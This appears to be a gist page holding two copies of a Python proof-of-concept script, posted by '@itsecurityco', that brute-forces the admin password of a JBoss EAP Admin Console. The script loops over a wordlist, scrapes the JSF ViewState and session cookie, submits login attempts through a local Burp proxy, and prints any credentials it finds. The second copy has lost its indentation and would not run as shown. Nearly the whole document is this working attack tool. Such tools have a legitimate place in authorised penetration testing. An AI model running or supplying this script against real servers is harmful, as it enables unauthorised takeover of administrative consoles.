itsecurityco · September 10, 2014 00:52
diff --git a/Bruteforce JBoss EAP Admin Console(PoC).py b/Bruteforce JBoss EAP Admin Console(PoC).py
 """ 
 Bruteforce JBoss EAP Admin Console 1.3.4.SP6 (r999)
 Author: @itsecurityco
 Use: python bruteforce(PoC).py ip:port wordlist
 """
 
 import re
 import sys
 import urllib
 import requests
 from time import time
 from colorama import Fore, Back, Style, init
 init()
 start_time = time()
 
 HOST = sys.argv[1]
 WORDLIST = sys.argv[2]
 
 # Burp suite proxy.
 proxies = {"http": "http://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}
 
 # Password list file.
 f = open(WORDLIST, 'r')
 lines = f.read().splitlines()
 f.close()
 
 for passwd in lines:
 
    JSESSIONID = ""
    
    # Get ViewState.
    headers = {
        "Host":            HOST,
        "User-Agent":      "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
        "Accept":          "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Cookie":          "JSESSIONID=" + JSESSIONID,
        "Connection":      "keep-alive",
    }
 
    r1 = requests.get("http://%s/admin-console/login.seam" % HOST, proxies=proxies, headers=headers)
    m1 = re.search(r'<input type="hidden" name="javax\.faces\.ViewState" id="javax\.faces\.ViewState" value="(.*)" autocomplete="off"', r1.text)
    
    if not m1:
        print(Fore.RED + "[!] Error obteniendo ViewState.")
        exit()
    
    ViewState = m1.group(1)
 
    # Try password.
    payload = {
        'login_form'            : urllib.quote('login_form'),
        'login_form:name'       : urllib.quote('admin'),
        'login_form:password'   : urllib.quote(passwd),
        'login_form:submit'     : urllib.quote('Login'),
        'javax.faces.ViewState' : urllib.quote(str(ViewState))
    }
 
    m2 = re.search(r'JSESSIONID=(.*); Path=\/admin-console', r1.headers['Set-Cookie'])
    
    if not m2:
        print(Fore.RED + "[!] Error obteniendo nuevo JSESSIONID.")
        exit()
    
    JSESSIONID = m2.group(1)
    
    headers = {
        "Host":            HOST,
        "User-Agent":      "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
        "Accept":          "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Referer":         "http://%s/admin-console/login.seam" % HOST,
        "Cookie":          "JSESSIONID=" + JSESSIONID,
        "Connection":      "keep-alive",
        "Content-Type":    "application/x-www-form-urlencoded"
    }
 
    r2 = requests.post("http://%s/admin-console/login.seam" % HOST, data=payload, proxies=proxies, allow_redirects=False, headers=headers)
    m3 = re.search(r'log in attempt failed, please try again', r2.text)
    
    print(Fore.GREEN + "[+] %d probando: admin:%s ..." % (r2.status_code, passwd))
    if not m3:
        print(Fore.YELLOW + "[!] Credenciales encontradas: admin:%s." % passwd)
        break
 
 print(Fore.GREEN + "\n--- %d seconds, %d minutes ---" % (int(time()-start_time), int(time()-start_time)/60))
	"""
	Bruteforce JBoss EAP Admin Console 1.3.4.SP6 (r999)
	Author: @itsecurityco
	Use: python bruteforce(PoC).py ip:port wordlist
	"""

	import re
	import sys
	import urllib
	import requests
	from time import time
	from colorama import Fore, Back, Style, init
	init()
	start_time = time()

	HOST = sys.argv[1]
	WORDLIST = sys.argv[2]

	# Burp suite proxy.
	proxies = {"http": "http://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}

	# Password list file.
	f = open(WORDLIST, 'r')
	lines = f.read().splitlines()
	f.close()

	for passwd in lines:

	JSESSIONID = ""

	# Get ViewState.
	headers = {
	"Host": HOST,
	"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
	"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8",
	"Accept-Language": "es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
	"Accept-Encoding": "gzip, deflate",
	"Cookie": "JSESSIONID=" + JSESSIONID,
	"Connection": "keep-alive",
	}

	r1 = requests.get("http://%s/admin-console/login.seam" % HOST, proxies=proxies, headers=headers)
	m1 = re.search(r'<input type="hidden" name="javax\.faces\.ViewState" id="javax\.faces\.ViewState" value="(.*)" autocomplete="off"', r1.text)

	if not m1:
	print(Fore.RED + "[!] Error obteniendo ViewState.")
	exit()

	ViewState = m1.group(1)

	# Try password.
	payload = {
	'login_form' : urllib.quote('login_form'),
	'login_form:name' : urllib.quote('admin'),
	'login_form:password' : urllib.quote(passwd),
	'login_form:submit' : urllib.quote('Login'),
	'javax.faces.ViewState' : urllib.quote(str(ViewState))
	}

	m2 = re.search(r'JSESSIONID=(.*); Path=\/admin-console', r1.headers['Set-Cookie'])

	if not m2:
	print(Fore.RED + "[!] Error obteniendo nuevo JSESSIONID.")
	exit()

	JSESSIONID = m2.group(1)

	headers = {
	"Host": HOST,
	"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
	"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8",
	"Accept-Language": "es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3",
	"Accept-Encoding": "gzip, deflate",
	"Referer": "http://%s/admin-console/login.seam" % HOST,
	"Cookie": "JSESSIONID=" + JSESSIONID,
	"Connection": "keep-alive",
	"Content-Type": "application/x-www-form-urlencoded"
	}

	r2 = requests.post("http://%s/admin-console/login.seam" % HOST, data=payload, proxies=proxies, allow_redirects=False, headers=headers)
	m3 = re.search(r'log in attempt failed, please try again', r2.text)

	print(Fore.GREEN + "[+] %d probando: admin:%s ..." % (r2.status_code, passwd))
	if not m3:
	print(Fore.YELLOW + "[!] Credenciales encontradas: admin:%s." % passwd)
	break

	print(Fore.GREEN + "\n--- %d seconds, %d minutes ---" % (int(time()-start_time), int(time()-start_time)/60))